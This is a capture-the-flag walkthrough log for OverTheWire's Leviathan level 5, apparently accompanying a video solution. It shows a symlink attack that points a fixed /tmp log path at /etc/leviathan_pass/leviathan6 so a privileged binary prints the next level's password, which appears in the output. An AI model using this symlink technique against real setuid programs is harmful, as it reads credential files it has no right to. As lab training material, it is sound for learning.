Video Solution: https://youtu.be/G5bhfEVz2cc
Task on OverTheWire: http://overthewire.org/wargames/leviathan

leviathan5@leviathan:~$ ls
leviathan5
leviathan5@leviathan:~$ ./leviathan5 
Cannot find /tmp/file.log
leviathan5@leviathan:~$ ltrace ./leviathan5 
__libc_start_main(0x56555760, 1, 0xffffd734, 0x56555840 <unfinished ...>
fopen("/tmp/file.log", "r")                                          = 0
puts("Cannot find /tmp/file.log"Cannot find /tmp/file.log
)                                    = 26
exit(-1 <no return ...>
+++ exited (status 255) +++
leviathan5@leviathan:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@leviathan:~$ ./leviathan5 
UgaoFee4li
leviathan5@leviathan:~$ ssh leviathan6@localhost
